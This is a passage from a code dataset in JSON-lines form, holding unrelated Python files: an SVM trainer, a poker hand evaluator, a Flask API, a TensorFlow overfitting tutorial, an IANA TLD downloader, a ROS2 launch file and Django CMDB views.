okData = np.fromfile(okfile).reshape((-1,8))\n okDataTraining = okData[0:int(okData.shape[0] * 0.8),:]\n okClassTraining = np.zeros((okDataTraining.shape[0], 1))\n \n trainingData = np.float32(np.vstack((badDataTraining, okDataTraining)))\n responses = np.int32(np.vstack((badClassTraining, okClassTraining)))[:,0]\n \n badMultiply = float(okClassTraining.size) / (badClassTraining.size + okClassTraining.size)\n okMultiply = float(badClassTraining.size) / (badClassTraining.size + okClassTraining.size)\n \n bestScore = 0\n bestC = 0\n bestG = 0\n \n for _ in range (0,5):\n\n data_train, data_test, labels_train, labels_test = train_test_split(trainingData, responses, test_size=0.20, random_state=42)\n \n C_range = np.logspace(-2, 10, 13)\n gamma_range = np.logspace(-9, 3, 13)\n for c in C_range:\n for g in gamma_range:\n svm = cv2.ml.SVM_create()\n svm.setType(cv2.ml.SVM_C_SVC)\n svm.setKernel(cv2.ml.SVM_RBF)\n svm.setGamma(g)\n svm.setC(c)\n svm.setClassWeights(np.array([badMultiply, okMultiply]))\n \n svm.train(data_train, cv2.ml.ROW_SAMPLE, labels_train)\n \n output = svm.predict(data_test)[1].ravel()\n \n correct = np.sum(output == labels_test)\n total = output.size\n score = np.float32(correct) / total\n\n correctBad = np.sum(output[:labels_test.size] == labels_test[:labels_test.size])\n scoreBad = np.float32(correctBad) / labels_test.size\n \n totalScore = 3 * scoreBad + score\n \n if totalScore > bestScore:\n bestScore = totalScore\n bestC = c\n bestG = g\n \n svm = cv2.ml.SVM_create()\n svm.setType(cv2.ml.SVM_C_SVC)\n svm.setKernel(cv2.ml.SVM_RBF)\n svm.setGamma(bestG)\n svm.setC(bestC)\n svm.setClassWeights(np.array([badMultiply, okMultiply]))\n svm.train(trainingData, cv2.ml.ROW_SAMPLE, responses)\n \n svm.save(saveLocation)\n \n ","sub_path":"Code/rbfClassifier.py","file_name":"rbfClassifier.py","file_ext":"py","file_size_in_byte":4315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"108063193","text":"def cat_dog(str):\n catCount = 0\n dogCount = 0\n for i in range(len(str)-2):\n if str[i:i+3] == \"cat\":\n catCount += 1\n if str[i:i+3] == \"dog\":\n dogCount += 1\n if catCount == dogCount:\n return True\n return False\n \n \n\n \n \n","sub_path":"string-2/cat_dog.py","file_name":"cat_dog.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"347186124","text":"\n\n#calss header\nclass _ENDANGERED():\n\tdef __init__(self,): \n\t\tself.name = \"ENDANGERED\"\n\t\tself.definitions = [u'animals or plants that may soon not exist because there are very few now alive']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_endangered.py","file_name":"_endangered.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"230289410","text":"from setuptools import setup\nimport os\n\ndef prepare_sources():\n srcdir = \"src/remclient\"\n modules = [\"__init__.py\", \"remclient.py\", \"constants.py\"] \n if not os.path.isdir(srcdir):\n os.makedirs(srcdir)\n for filename in modules:\n target = os.path.join(\"src/remclient\", filename)\n if os.path.islink(target) or os.path.isfile(target):\n os.unlink(target)\n os.symlink(os.path.join(\"../..\", filename), target)\n\n\nprepare_sources()\n\nsetup(\n name = \"remclient\",\n description = \"client library for REM server; see at https://github.com/heni/rem\",\n maintainer = \"Eugene Krokhalev\",\n maintainer_email = \"Eugene.Krokhalev@gmail.com\",\n version = \"1.0.6\",\n packages = [ \"remclient\" ],\n package_dir = { '': \"src\" },\n scripts = [ \"rem-tool\" ],\n install_requires = [ \"six\"],\n classifiers = [\n \"Development Status :: 5 - Production/Stable\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Operating System :: POSIX :: BSD\",\n \"Operating System :: POSIX :: Linux\",\n \"License :: OSI Approved :: MIT License\",\n \"Programming Language :: Python :: 2.7\",\n \"Programming Language :: Python :: 3\",\n \"Topic :: System :: Systems Administration\",\n \"Topic :: Software Development\"\n ]\n)\n","sub_path":"client/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"605981923","text":"from functools import total_ordering\n \nclass Hand(object):\n #Construtor da classe\n def __init__(self, param):\n #Atribuicao de valores nos atributos da classe\n self.order = [\"High Card\", \"One Pair\", \"Two Pairs\",\"Three of a Kind\", \"Straight\",\n \"Flush\", \"Full House\", \"Four of a Kind\", \"Straight Flush\"]\n self.cards = param\n self.hand = \"High Card\"\n self.rank = 2\n self.parse_cards()\n \n def parse_cards(self):\n #Dictionary - key:value\n c = {\"2\": 2, \"3\": 3, \"4\": 4, \"5\": 5, \"6\": 6, \"7\": 7, \"8\": 8, \"9\": 9, \"T\": 10, \"J\": 11, \"Q\": 12, \"K\": 13,\"A\": 14}\n #Lista de cartas conforme Dictionary\n cards = {(c[i[0]], i[1]) for i in self.cards.split()}\n #Lista de Naipes\n colors = [i[1] for i in cards]\n #Ordena valores das cartas\n values = sorted([i[0] for i in cards])\n #Atribuicao de valores nos atributos da classe\n self.values = values\n self.cards = cards\n\n #Cria uma lista distinta dos naipes e retorna a quantidade de naipes distintos\n if len(set(colors)) == 1: \n if self._consecutive_number(values):\n self.hand = \"Straight Flush\"\n self.rank = values[-1]\n return\n self.hand = \"Flush\"\n #Ultimo valor do array: maior valor\n self.rank = values[-1]\n return\n \n if self._consecutive_number(values):\n self.hand = \"Straight\"\n #Ultimo valor do array: maior valor\n self.rank = values[-1]\n return\n \n # Iterando valores do Dictionary c\n for i in c.values():\n if values.count(i) == 4:\n self.hand = \"Four of a Kind\"\n self.rank = i\n return\n \n if values.count(i) == 3:\n #Cria uma lista distinta dos valores e retorna a quantidade de valores distintos\n if len(set(values)) == 2:\n self.hand = \"Full House\"\n self.rank = i\n return\n else:\n self.hand = \"Three of a Kind\"\n self.rank = i\n return\n\n # Iterando valores do Dictionary c\n for i in c.values():\n if values.count(i) == 2:\n for j in c.values():\n if j == i:\n continue\n if values.count(j) == 2:\n self.hand = \"Two Pairs\"\n self.rank = (max(i, j), min(i, j))\n return\n self.hand = \"One Pair\"\n self.rank = i\n return\n \n self.rank = values[-1]\n \n def _consecutive_number(self, param):\n # Verifica valores distintos\n if len(set(param)) != 5:\n return False\n # Verifica se valores consecutivos\n if param[-1] - param[0] == 4:\n return True\n return False\n \n # Funcao de comparacao de objeto: a > b\n def __gt__(self, c):\n if c.hand == self.hand:\n if self.rank == c.rank:\n # Inverte lista e verifica lista maiores valores\n return list(reversed(self.values)) > list(reversed(c.values))\n return self.rank > c.rank\n # Verifica qual ordem e maior pelo index\n return self.order.index(self.hand) > self.order.index(c.hand)\n \nw = []\nwith open(\"poker.txt\") as f:\n # Retonar um iterator \n for index, item in enumerate(f):\n p1 = Hand(item[:14])\n p2 = Hand(item[15:])\n # Utiliza funcao __gt__\n if p1>p2:\n winner = 1\n else:\n winner = 2\n \n w.append(winner)\n# Quantidade de elementos 1 no array\nprint(w.count(1))\n","sub_path":"EulerProblemPython.py","file_name":"EulerProblemPython.py","file_ext":"py","file_size_in_byte":3849,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"303436890","text":"#-*-coding:utf-8-*-\nfrom flask import Flask, request, json\nfrom datetime import datetime\nimport os\n\napp = Flask(__name__)\n\ncommonResponse = {\n 'version': '2.0',\n 'resultCode': 'OK',\n 'output': {}\n}\n\nshoppingItems = [\n ['간장', '2021-09-20'],\n ['설탕', '2021-09-27'],\n ['토마토', '2021-10-10'],\n]\n\ndef getUtteranceParameter () :\n data = request.get_json()\n return data['action']['parameters']\n\n@app.route('/')\ndef index():\n return 'Hello Flask'\n\n@app.route('/createItems', methods=['POST'])\ndef createItems():\n\n utteranceParameter = getUtteranceParameter()\n utteranceValue = utteranceParameter['item']['value']\n\n response = commonResponse\n\n response['output']['existYn'] = 'N'\n\n for i in shoppingItems :\n if i[0] == utteranceValue :\n response['output']['existYn'] = 'Y'\n response['output']['registerDate'] = i[1]\n\n if response['output']['existYn'] == 'N':\n shoppingItems.append([utteranceValue, datetime.today().strftime('%Y-%m-%d')])\n return json.dumps(response)\n\n@app.route('/readItems', methods=['POST'])\ndef readItems():\n\n\n response = commonResponse\n\n response['output']['itemList'] = ''\n itemList = ''\n for i in shoppingItems :\n itemList = itemList + i[0]\n response['output']['itemList'] = itemList\n return json.dumps(response)\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5500, debug=True)\n\n\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"215201152","text":"\r\n#@title Licensed under the Apache License, Version 2.0 (the \"License\");\r\n# you may not use this file except in compliance with the License.\r\n# You may obtain a copy of the License at\r\n#\r\n# https://www.apache.org/licenses/LICENSE-2.0\r\n#\r\n# Unless required by applicable law or agreed to in writing, software\r\n# distributed under the License is distributed on an \"AS IS\" BASIS,\r\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\n# See the License for the specific language governing permissions and\r\n# limitations under the License.\r\n\r\n#@title MIT License\r\n#\r\n# Copyright (c) 2017 François Chollet\r\n#\r\n# Permission is hereby granted, free of charge, to any person obtaining a\r\n# copy of this software and associated documentation files (the \"Software\"),\r\n# to deal in the Software without restriction, including without limitation\r\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\r\n# and/or sell copies of the Software, and to permit persons to whom the\r\n# Software is furnished to do so, subject to the following conditions:\r\n#\r\n# The above copyright notice and this permission notice shall be included in\r\n# all copies or substantial portions of the Software.\r\n#\r\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\r\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\r\n# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER\r\n# DEALINGS IN THE SOFTWARE.\r\n\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\nprint(tf.__version__)\r\n\r\nNUM_WORDS = 10000\r\n\r\n(train_data, train_labels), (test_data, test_labels) = keras.datasets.imdb.load_data(num_words=NUM_WORDS)\r\n\r\ndef multi_hot_sequences(sequences, dimension):\r\n # Create an all-zero matrix of shape (len(sequences), dimension)\r\n results = np.zeros((len(sequences), dimension))\r\n for i, word_indices in enumerate(sequences):\r\n results[i, word_indices] = 1.0 # set specific indices of results[i] to 1s\r\n return results\r\n\r\n\r\ntrain_data = multi_hot_sequences(train_data, dimension=NUM_WORDS)\r\ntest_data = multi_hot_sequences(test_data, dimension=NUM_WORDS)\r\n\r\nplt.plot(train_data[0])\r\n\r\nbaseline_model = keras.Sequential([\r\n # `input_shape` is only required here so that `.summary` works. \r\n keras.layers.Dense(16, activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\r\n keras.layers.Dense(16, activation=tf.nn.relu),\r\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\r\n])\r\n\r\nbaseline_model.compile(optimizer='adam',\r\n loss='binary_crossentropy',\r\n metrics=['accuracy', 'binary_crossentropy'])\r\n\r\nbaseline_model.summary()\r\n\r\nbaseline_history = baseline_model.fit(train_data,\r\n train_labels,\r\n epochs=20,\r\n batch_size=512,\r\n validation_data=(test_data, test_labels),\r\n verbose=2)\r\n\r\nsmaller_model = keras.Sequential([\r\n keras.layers.Dense(4, activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\r\n keras.layers.Dense(4, activation=tf.nn.relu),\r\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\r\n])\r\n\r\nsmaller_model.compile(optimizer='adam',\r\n loss='binary_crossentropy',\r\n metrics=['accuracy', 'binary_crossentropy'])\r\n\r\nsmaller_model.summary()\r\n\r\nsmaller_history = smaller_model.fit(train_data,\r\n train_labels,\r\n epochs=20,\r\n batch_size=512,\r\n validation_data=(test_data, test_labels),\r\n verbose=2)\r\n\r\nbigger_model = keras.models.Sequential([\r\n keras.layers.Dense(512, activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\r\n keras.layers.Dense(512, activation=tf.nn.relu),\r\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\r\n])\r\n\r\nbigger_model.compile(optimizer='adam',\r\n loss='binary_crossentropy',\r\n metrics=['accuracy','binary_crossentropy'])\r\n\r\nbigger_model.summary()\r\n\r\nbigger_history = bigger_model.fit(train_data, train_labels,\r\n epochs=20,\r\n batch_size=512,\r\n validation_data=(test_data, test_labels),\r\n verbose=2)\r\n\r\ndef plot_history(histories, key='binary_crossentropy'):\r\n plt.figure(figsize=(16,10))\r\n \r\n for name, history in histories:\r\n val = plt.plot(history.epoch, history.history['val_'+key],\r\n '--', label=name.title()+' Val')\r\n plt.plot(history.epoch, history.history[key], color=val[0].get_color(),\r\n label=name.title()+' Train')\r\n\r\n plt.xlabel('Epochs')\r\n plt.ylabel(key.replace('_',' ').title())\r\n plt.legend()\r\n\r\n plt.xlim([0,max(history.epoch)])\r\n\r\n\r\nplot_history([('baseline', baseline_history),\r\n ('smaller', smaller_history),\r\n ('bigger', bigger_history)])\r\n\r\nl2_model = keras.models.Sequential([\r\n keras.layers.Dense(16, kernel_regularizer=keras.regularizers.l2(0.001),\r\n activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\r\n keras.layers.Dense(16, kernel_regularizer=keras.regularizers.l2(0.001),\r\n activation=tf.nn.relu),\r\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\r\n])\r\n\r\nl2_model.compile(optimizer='adam',\r\n loss='binary_crossentropy',\r\n metrics=['accuracy', 'binary_crossentropy'])\r\n\r\nl2_model_history = l2_model.fit(train_data, train_labels,\r\n epochs=20,\r\n batch_size=512,\r\n validation_data=(test_data, test_labels),\r\n verbose=2)\r\n\r\nplot_history([('baseline', baseline_history),\r\n ('l2', l2_model_history)])\r\n\r\ndpt_model = keras.models.Sequential([\r\n keras.layers.Dense(16, activation=tf.nn.relu, input_shape=(NUM_WORDS,)),\r\n keras.layers.Dropout(0.5),\r\n keras.layers.Dense(16, activation=tf.nn.relu),\r\n keras.layers.Dropout(0.5),\r\n keras.layers.Dense(1, activation=tf.nn.sigmoid)\r\n])\r\n\r\ndpt_model.compile(optimizer='adam',\r\n loss='binary_crossentropy',\r\n metrics=['accuracy','binary_crossentropy'])\r\n\r\ndpt_model_history = dpt_model.fit(train_data, train_labels,\r\n epochs=20,\r\n batch_size=512,\r\n validation_data=(test_data, test_labels),\r\n verbose=2)\r\n\r\nplot_history([('baseline', baseline_history),\r\n ('dropout', dpt_model_history)])\r\n","sub_path":"dia_2/tensorflow/overfit_and_underfit.py","file_name":"overfit_and_underfit.py","file_ext":"py","file_size_in_byte":7056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"210504413","text":"import hashlib\nimport logging\nimport re\nimport requests\n\nfrom html.parser import HTMLParser\nfrom datetime import datetime\n\n\nclass IANAHTMLParser(HTMLParser):\n \"\"\"Implementation of HTML Parser, specifically for finding the date which\n the latest top level domain list was published by IANA - scraped from\n http://data.iana.org/TLD/\"\"\"\n\n _found_date_line = False\n _found_date = False\n _date = ''\n\n def handle_starttag(self, tag, attrs):\n \"\"\"Look for the table data (td) element of the top level domain list\n \n 1. Look for the href tag containing the tld file\n 2. Find the next table data (td) element - as of 4/2017 this is\n the field that contains the date\n 3. Ignore all other lines.\n \"\"\"\n if self._date == '':\n if not self._found_date:\n if self._found_date_line:\n if tag == 'td':\n self._found_date = True\n else:\n if tag == 'a':\n for attr, value in attrs:\n if attr == 'href':\n if value == 'tlds-alpha-by-domain.txt':\n self._found_date_line = True\n\n def handle_data(self, data):\n \"\"\"Pull the date from the td element. Ignore all other data.\"\"\"\n if self._date == '':\n if self._found_date:\n self._date = datetime.strptime(data.strip(), \"%Y-%m-%d %H:%M\")\n\n @property\n def date(self) -> datetime:\n return self._date\n\n\nclass IANA:\n \"\"\"Class for verifying IANA TLD file and presenting the TLD list\"\"\"\n\n def __init__(self):\n self._tlds = ''\n self._tld_hash = ''\n self._tld_date = ''\n\n @property\n def tlds(self) -> [str]:\n \"\"\"The top level domains in a list\"\"\"\n if len(self._tlds) == 0:\n self._get_tlds()\n return self._tlds\n\n @property\n def tld_date(self) -> datetime:\n \"\"\"The date the top level domains were published by IANA\"\"\"\n if not type(self._tld_date) is datetime:\n self._get_tld_date()\n return self._tld_date\n\n @property\n def tld_hash(self) -> str:\n \"\"\"The md5 hash of the TLD file as published by IANA\"\"\"\n if len(self._tld_hash) < 32:\n self._get_tld_published_hash()\n return self._tld_hash\n\n def _get_tld_published_hash(self) -> None:\n \"\"\"Sets the published hash value of the class object. Called when \n needed by the class (when the tld_hash) property is requested the \n first time.\n \n Raises runtime errors when problems downloading the md5 hash file\n (http://data.iana.org/TLD/tlds-alpha-by-domain.txt.md5) or reading\n the published hash\"\"\"\n # Get IANA TLD list and published md5 hash of file.\n url_md5 = 'http://data.iana.org/TLD/tlds-alpha-by-domain.txt.md5'\n\n try:\n tlds_published_hash = (requests.get(url_md5)).text\n except RuntimeError:\n msg = 'Could not download IANA md5 hash file ({0})'.format(url_md5)\n logging.error(msg)\n raise\n\n # get published md5 hash\n match = re.search('^([a-f0-9]{32})\\s+([a-z.-]+$)', tlds_published_hash)\n if not match:\n msg = 'Could not find md5 hash in IANA file ({0})'.format(url_md5)\n logging.error(msg)\n raise\n\n assert len(match.group(1)) == 32\n self._tld_hash = match.group(1)\n\n def _get_tlds(self) -> None:\n \"\"\"Creates the list of strings containing the TLDs from the published\n IANA file (http://data.iana.org/TLD/tlds-alpha-by-domain.txt). Downloads \n the file and validates by checking the published hash\n \n Raises runtime errors when problems downloading the tld file\n or the md5 hash of the downloaded file and the published hash do not match\"\"\"\n url_tld_list = 'http://data.iana.org/TLD/tlds-alpha-by-domain.txt'\n\n try:\n tlds = (requests.get(url_tld_list)).text\n except:\n msg = 'Could not download IANA TLD list ({0})'.format(url_tld_list)\n logging.error(msg)\n raise\n\n tlds_hash = hashlib.md5(tlds.encode('utf-8')).hexdigest()\n\n if not tlds_hash == self.tld_hash:\n msg = 'Downloaded IANA TLD file hash ({0}) did not match provided md5 hash ({1}).'\\\n .format(tlds_hash, self.tld_hash)\n logging.error(msg)\n raise\n\n self._tlds = tlds\n\n def _get_tld_date(self) -> None:\n \"\"\"Sets the published date (IANA TLD file date) of the class object. \n Called when needed by the class (when the tld_hash) property is \n requested the first time.\n \n Raises runtime errors when problems retrieving the TLD page\n (http://data.iana.org/TLD) or the retrieved date was not read correctly.\"\"\"\n url = 'http://data.iana.org/TLD'\n try:\n raw_response = (requests.get(url)).text\n except:\n msg = 'Did not get valid response from TLD site ({0})'.format(url)\n logging.error(msg)\n raise\n\n response = IANAHTMLParser()\n response.feed(raw_response)\n if type(response.date) == datetime:\n self._tld_date = response.date\n else:\n msg = 'Date from ({0}) not in correct datetime format'.format(url)\n raise RuntimeError(msg)\n","sub_path":"iana.py","file_name":"iana.py","file_ext":"py","file_size_in_byte":5470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"515212322","text":"# Copyright 2018 ADLINK Technology, Inc.\n# Developer: HaoChih, LIN (haochih.lin@adlinktech.com)\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport os\n\nfrom ament_index_python.packages import get_package_share_directory\nfrom launch.exit_handler import restart_exit_handler\nfrom ros2run.api import get_executable_path\n\n\ndef launch(launch_descriptor, argv):\n ld = launch_descriptor\n package = 'turtlebot2_drivers'\n ld.add_process(\n cmd=[get_executable_path(package_name=package, executable_name='kobuki_node')],\n name='kobuki_node',\n exit_handler=restart_exit_handler,\n )\n\n package = 'ydlidar'\n ld.add_process(\n cmd=[get_executable_path(package_name=package, executable_name='ydlidar_node')],\n name='ydlidar_node',\n exit_handler=restart_exit_handler,\n )\n\n package = 'tf2_ros'\n ld.add_process(\n # Transform from base_link to laser_frame \n cmd=[\n get_executable_path(\n package_name=package, executable_name='static_transform_publisher'),\n '0.0', '0.0', '0.1',\n '0', '0', '0', '1',\n 'base_link',\n 'laser_frame'\n ],\n name='static_tf_pub_base_rgb',\n exit_handler=restart_exit_handler,\n )\n\t\t\t\n package = 'joy'\n ld.add_process(\n cmd=[get_executable_path(package_name=package, executable_name='joy_node')],\n name='joy_node',\n exit_handler=restart_exit_handler,\n )\n\t\n package = 'teleop_twist_joy'\n ld.add_process(\n cmd=[get_executable_path(package_name=package, executable_name='teleop_node')],\n name='teleop_node',\n exit_handler=restart_exit_handler,\n )\n\t\n package = 'slam_karto'\n ld.add_process(\n cmd=[get_executable_path(package_name=package, executable_name='slam_karto')],\n name='slam_karto',\n exit_handler=restart_exit_handler,\n )\n\n return ld\n","sub_path":"launch/slam_karto_demo.py","file_name":"slam_karto_demo.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"587941048","text":"# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.http import HttpResponseRedirect\nfrom cmdb.models import Rack \nfrom cmdb.models import IDC\nfrom cmdb.models import HostPhysical\nimport json\nimport urllib\nimport cmdb_log\n\nfrom django.views.decorators.csrf import csrf_exempt\n\n\ndef rack_get_byid(request,id):\n if not request.user.is_authenticated():\n json_r = json.dumps({\"result\":\"no login\"})\n return HttpResponse(json_r)\n id = id\n models = list(Rack.objects.filter(idc=id).values())\n json_r = json.dumps(models)\n return HttpResponse(json_r)\n\n@csrf_exempt \ndef rack_get(request):\n if not request.user.is_authenticated():\n json_r = json.dumps({\"result\":\"no login\"})\n return HttpResponse(json_r)\n key = request.POST.get('key','all')\n rack_list = []\n if key == 'all':\n pageIndex = request.POST.get('pageIndex',0)\n pageSize = request.POST.get('pageSize',100)\n start = int(pageIndex)*int(pageSize)\n stop = int(pageIndex)*int(pageSize) + int(pageSize)\n racks = Rack.objects.select_related().all()\n for rack in racks:\n rack_d = {'IDC_id':rack.idc.IDC_Name,'Rack_Name':rack.Rack_Name,'id':rack.id} \n rack_list.append(rack_d)\n data = {\"total\":len(rack_list),\"data\":rack_list[start:stop]}\n json_r = json.dumps(data)\n elif key == 'id':\n id = request.POST.get('id')\n rack = Rack.objects.get(id=id)\n rack_d = {'IDC_id':rack.idc.id,'Rack_Name':rack.Rack_Name,'id':rack.id}\n json_r = json.dumps(rack_d)\n else:\n racks= Rack.objects.filter(Rack_Name__contains=key)\n for rack in racks:\n rack_d = {'IDC_id':rack.idc.IDC_Name,'Rack_Name':rack.Rack_Name,'id':rack.id} \n rack_list.append(rack_d)\n #data = {\"total\":len(rack_list),\"data\":rack_list}\n json_r = json.dumps(rack_list)\n return HttpResponse(json_r)\n\n@csrf_exempt\ndef rack_search(request):\n if not request.user.is_authenticated():\n return HttpResponseRedirect(\"/ops/cmdb/html/login.html\")\n json_str =request.body\n data = json.loads(json_str)\n key = data['key']\n if key == 'id':\n rack = Rack.objects.get(id=data['id'])\n rack_d = {'IDC_id':rack.idc.id,'Rack_Name':rack.Rack_Name,'id':rack.id}\n json_r = json.dumps(rack_d)\n if key == 'Rack_Name':\n rack_r = list(Rack.objects.filter(Rack_Name__contains=data['Rack_Name']).values())[0]\n json_r = json.dumps(rack_r)\n return HttpResponse(json_r)\n\n@csrf_exempt \ndef rack_save(request):\n if not request.user.is_authenticated():\n json_r = json.dumps({\"result\":\"no login\"})\n return HttpResponse(json_r)\n elif not request.user.has_perm('cmdb.change_rack'):\n json_r = json.dumps({\"result\":\"no permission\"})\n return HttpResponse(json_r)\n json_str = request.body\n data = json.loads(json_str)\n if data['id']:\n r = Rack.objects.filter(id=data['id'])\n i = IDC.objects.get(id=data['IDC_id'])\n message = cmdb_log.cmp(list(r.values())[0],data)\n r.update(Rack_Name = data['Rack_Name'],idc = i)\n cmdb_log.log_change(request,r[0],r[0].Rack_Name,message)\n else:\n i = IDC.objects.get(id=data['IDC_id'])\n r = Rack(Rack_Name = data['Rack_Name'],idc = i)\n r.save()\n cmdb_log.log_addition(request,r,r.Rack_Name,data)\n json_r = json.dumps({\"result\":\"save sucess\"})\n return HttpResponse(json_r)\n\n@csrf_exempt\ndef rack_del(request):\n if not request.user.is_authenticated():\n json_r = json.dumps({\"result\":\"no login\"})\n return HttpResponse(json_r)\n elif not request.user.has_perm('cmdb.change_rack'):\n json_r = json.dumps({\"result\":\"no permission\"})\n return HttpResponse(json_r)\n json_str =request.body\n data = json.loads(json_str)\n ids = data['id'].split(',')\n for del_id in ids:\n i = Rack.objects.filter(id=del_id)\n h = HostPhysical.objects.filter(rack=del_id)\n if len(h):\n json_r = json.dumps({\"result\":\"include hosts\"})\n return HttpResponse(json_r)\n cmdb_log.log_deletion(request,i[0],i[0].Rack_Name,data)\n i.delete()\n json_r = json.dumps({\"result\":\"delete sucess\"}) \n return HttpResponse(json_r)\n","sub_path":"cmdb/object_rack_views.py","file_name":"object_rack_views.py","file_ext":"py","file_size_in_byte":4347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"180298596","text":"__author__ = 'MarinaFomicheva'\n\nimport scipy.stats as stats\nfrom collections import defaultdict\nimport numpy as np\nimport math\n\ndef test_normality(data):\n\n transformed = log_transform(data)\n results = []\n\n for phrase in sorted(transformed.keys()):\n t, p = stats.shapiro(transformed[phrase])\n results.append(p)\n\n return results\n\ndef log_transform(data):\n\n transformed = defaultdict(list)\n\n for phrase in sorted(data.keys()):\n for val in data[phrase]:\n transformed[phrase].append(math.log10(val + 1))\n\n return transformed\n\n\n","sub_path":"lognormal_test.py","file_name":"lognormal_test.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"138052671","text":"T=int(input())\nfor m in range(T):\n N=int(input())\n string=input().split(\" \")\n result=[]\n for i in range(N):\n string[i]=int(string[i])\n for i in range(N):\n index=1\n for j in range(i+1,N):\n if string[j]>string[i]:\n index=0\n if index==1:\n result.append(string[i])\n print(\" \".join(str(i) for i in result))\n","sub_path":"Code/CodeRecords/2281/60722/273569.py","file_name":"273569.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"553939297","text":"__author__ = 'thomas'\n\nimport logging\n\ndef init(log_file_name, withFile):\n global logger\n logger = logging.getLogger(__name__)\n\n # logger = logging.getLogger(__name__)\n # logging.basicConfig(level=logging.INFO,filename='example.log')\n\n log_level=logging.INFO\n logger.setLevel(log_level)\n\n # create console handler\n ch = logging.StreamHandler()\n ch.setLevel(log_level)\n # create formatter and add it to the handlers\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n logger.addHandler(ch)\n ch.setFormatter(formatter)\n\n if withFile:\n # create file handler which logs even debug messages\n fh = logging.FileHandler(log_file_name)\n fh.setLevel(log_level)\n fh.setFormatter(formatter)\n # add the handlers to the logger\n logger.addHandler(fh)\n\n # return logger\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"117747757","text":"from django.urls import path\r\nfrom website.views import IndexTemplateView, FuncionarioListView, SetorListView, FuncionarioUpdateView, SetorUpdateView, FuncionarioDeleteView, SetorDeleteView, FuncionarioCreateView, SetorCreateView\r\n\r\napp_name = 'website'\r\n\r\nurlpatterns = [\r\n\r\n\tpath('', IndexTemplateView.as_view(), 